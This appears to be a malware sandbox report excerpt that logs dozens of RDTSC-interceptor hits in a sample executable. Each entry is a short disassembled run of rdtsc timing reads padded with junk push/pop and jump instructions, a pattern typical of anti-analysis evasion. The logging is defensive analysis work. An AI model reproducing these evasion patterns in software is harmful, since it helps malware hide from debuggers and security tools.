    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EF2238 second address: EF223C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EF223C second address: EF2256 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0BACBDA3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0BACBDA3DBh 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EF27B7 second address: EF27BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EF27BB second address: EF27C5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0BACBDA3D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EFA0FF second address: EFA10B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F0BACBDA196h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EFA10B second address: EFA11D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0BACBDA3DCh 0x00000008 jns 00007F0BACBDA3D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EFA11D second address: EFA12C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EFA12C second address: EFA130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EFA130 second address: EFA134 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EFA134 second address: EFA13A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EF889C second address: EF88A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EF88A2 second address: EF88C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0BACBDA3D6h 0x0000000a jng 00007F0BACBDA3D6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0BACBDA3DEh 0x00000018 jp 00007F0BACBDA3D6h 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EF88C9 second address: EF88CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EF88CD second address: EF88E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0BACBDA3DDh 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EF8E55 second address: EF8E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EF8E59 second address: EF8E5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EF9177 second address: EF917B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EF975A second address: EF9760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EF9760 second address: EF9767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EF9767 second address: EF976C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EF976C second address: EF9772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EF9772 second address: EF9794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jne 00007F0BACBDA3D6h 0x00000010 jmp 00007F0BACBDA3DEh 0x00000015 pop ebx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EF9794 second address: EF97AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0BACBDA19Fh 0x0000000b popad 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EF97AA second address: EF97B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EF97B2 second address: EF97C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA19Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EF97C7 second address: EF97CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EF9AEF second address: EF9AF5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EF9AF5 second address: EF9B30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E2h 0x00000007 jmp 00007F0BACBDA3E5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0BACBDA3DDh 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EF9E0C second address: EF9E30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0BACBDA1A6h 0x0000000d je 00007F0BACBDA196h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EFE163 second address: EFE167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EFE167 second address: EFE16B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EFE16B second address: EFE171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EFE171 second address: EFE17B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EFE17B second address: EFE19C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EFE19C second address: EFE1A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F03619 second address: F0363F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E2h 0x00000007 jmp 00007F0BACBDA3DAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop esi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F0363F second address: F0365F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA1A6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F0365F second address: F03665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F09391 second address: F09397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F0951C second address: F09521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F0995A second address: F09975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BACBDA1A7h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F09975 second address: F09979 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F09979 second address: F09995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0BACBDA1A4h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F09AD0 second address: F09AD6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F0A0FD second address: F0A11A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0BACBDA1A4h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F0A11A second address: F0A124 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0BACBDA3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F0A124 second address: F0A153 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0BACBDA19Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F0BACBDA1A8h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F0A153 second address: F0A16A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BACBDA3DAh 0x00000009 popad 0x0000000a jbe 00007F0BACBDA3F3h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F0A16A second address: F0A185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BACBDA1A7h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F0A185 second address: F0A18A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F0A18A second address: F0A198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F0AF0E second address: F0AF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F0BACBDA3D6h 0x0000000d jmp 00007F0BACBDA3DFh 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F0AF2A second address: F0AF2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F0AF2E second address: F0AF54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BACBDA3E8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F08F5D second address: F08F63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F12614 second address: F12618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F12618 second address: F1261C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F1261C second address: F12624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F12922 second address: F12928 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F223B2 second address: F223BC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0BACBDA3DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F2256A second address: F22590 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0BACBDA1A8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F22590 second address: F225A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jno 00007F0BACBDA3D6h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F2457E second address: F24589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F24589 second address: F24596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F0BACBDA3D6h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F246F6 second address: F24700 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0BACBDA196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F2AA3C second address: F2AA54 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0BACBDA3D6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 jo 00007F0BACBDA3D6h 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F2CCC1 second address: F2CCE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0BACBDA196h 0x0000000a jnl 00007F0BACBDA19Eh 0x00000010 je 00007F0BACBDA1C5h 0x00000016 jc 00007F0BACBDA19Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F2CCE7 second address: F2CD06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F0BACBDA3E7h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F367D7 second address: F367DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F367DD second address: F367FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0BACBDA3DEh 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 jg 00007F0BACBDA3D6h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F367FD second address: F36801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F36801 second address: F36807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F36807 second address: F36811 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0BACBDA1A2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F36639 second address: F3663F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F3663F second address: F3665C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jmp 00007F0BACBDA1A5h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F3D71D second address: F3D731 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F3D88A second address: F3D8B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BACBDA1A1h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0BACBDA19Dh 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F3D9F2 second address: F3DA1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BACBDA3DCh 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jns 00007F0BACBDA3DCh 0x00000014 push eax 0x00000015 push edx 0x00000016 jng 00007F0BACBDA3D6h 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F3DA1B second address: F3DA1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F3DA1F second address: F3DA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jns 00007F0BACBDA3D6h 0x00000010 ja 00007F0BACBDA3D6h 0x00000016 jmp 00007F0BACBDA3E8h 0x0000001b popad 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F3DE81 second address: F3DEA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0BACBDA1A9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F3DEA0 second address: F3DEAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jns 00007F0BACBDA3D6h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F3DEAC second address: F3DEB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F3DEB0 second address: F3DEC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0BACBDA3D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F0BACBDA3D6h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F3DEC7 second address: F3DECB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F3E8E1 second address: F3E8F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BACBDA3DDh 0x00000009 pop ecx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F42CE3 second address: F42CE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F42CE9 second address: F42CEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F42CEF second address: F42CF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F42CF3 second address: F42D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0BACBDA3D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F44C1C second address: F44C4D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0BACBDA196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007F0BACBDA19Bh 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F0BACBDA196h 0x00000019 jmp 00007F0BACBDA1A2h 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F44C4D second address: F44C51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F44959 second address: F4497C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0BACBDA196h 0x0000000a popad 0x0000000b jmp 00007F0BACBDA1A8h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F4803F second address: F48055 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0BACBDA3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jc 00007F0BACBDA3F7h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
